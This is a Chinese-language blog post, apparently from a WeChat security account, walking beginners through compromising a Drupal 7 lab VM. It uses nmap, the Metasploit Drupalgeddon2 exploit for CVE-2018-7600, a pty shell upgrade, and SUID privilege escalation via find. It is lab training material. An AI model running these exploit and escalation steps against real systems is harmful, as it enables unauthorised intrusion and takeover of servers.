前言:本文中涉及到的技术,只提供思路,严禁用于违法测试
当然哦,还是那句话,还是用靶机吧,希望大家都保护好自己,哈哈哈
以后我会更新各种靶机的渗透,希望大家持续关注,跟着我一起学习吧!!!
我做的很适合初级的学习者,其中不乏趣味性,也有点难度,但总体思路是清晰的,有兴趣的师傅不妨试试。
一、靶机地址
公众号后台回复:靶机四,获取靶机地址。要是打不开去公众号主页加我,我给师傅发。
下载靶机后,双击用vmware打开。
靶机环境:处于NAT网络下的VM虚拟机。
二、靶机渗透
准备一台kali虚拟机,当攻击机。
1、获取目标ip
2、获取目标开放的端口号
3、漏洞探测
我们在上方扫描的nmap过程中,发现目标的网站建站系统是Drupal,我们现在去确定一下。
我们现在去网上查一下这个建站系统存在的历史漏洞,发现他的版本是7。
可以找到这个Drupal7版本对应的cve漏洞。(cve-2018-7600)
4、漏洞利用
发现这个建站系统存在的漏洞,我们用神器,msfconsole
工具,kali自带的有这个工具,我们去使用。
msfconsole
先查找Drupal的漏洞。
search drupal
use exploit/unix/webapp/drupal_drupalgeddon2
与此同时,我们去看看需要设置哪些payload。
设置一下攻击目标。
set rhosts 192.168.44.131
成功命令执行漏洞,我们想要使用shell界面,执行一些信息收集。
发现,看不到他的shell,太丑了,美化一下命令行
python -c "import pty;pty.spawn('/bin/bash')"
这样,就美观多了。
5、提权
我们成功获取了他的shell,但是他的权限太低,我们无法利用。
这里,我先使用sudo -l
发现没有什么可利用的,我们使用suid提权。
首先,我们先查找一下,系统上运行的所有SUID位的文件
find / -perm -u=s -type f 2>/dev/null
继续提权,使用find命令:
find . -exec /bin/sh ;
提权成功,寻找flag。
三、总结
以上为我的一些做题笔记,大佬勿喷。
主要是一个大致流程,很多技术还没涉及到,并且并不是只有一种办法,还有其他的渗透办法,大家思想不要局限了。后续打其他靶场会更加丰富!
感谢各位大佬们关注LHACK安全,正在努力的进步中,后续会坚持更新渗透漏洞思路分享、好用工具分享以及挖掘SRC思路等文章,希望能得到各位师傅们的关注与支持。想加入交流群的师傅们,欢迎加我,我拉师傅进群。
往期回顾
原文始发于微信公众号(LHACK安全):渗透实战(四)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论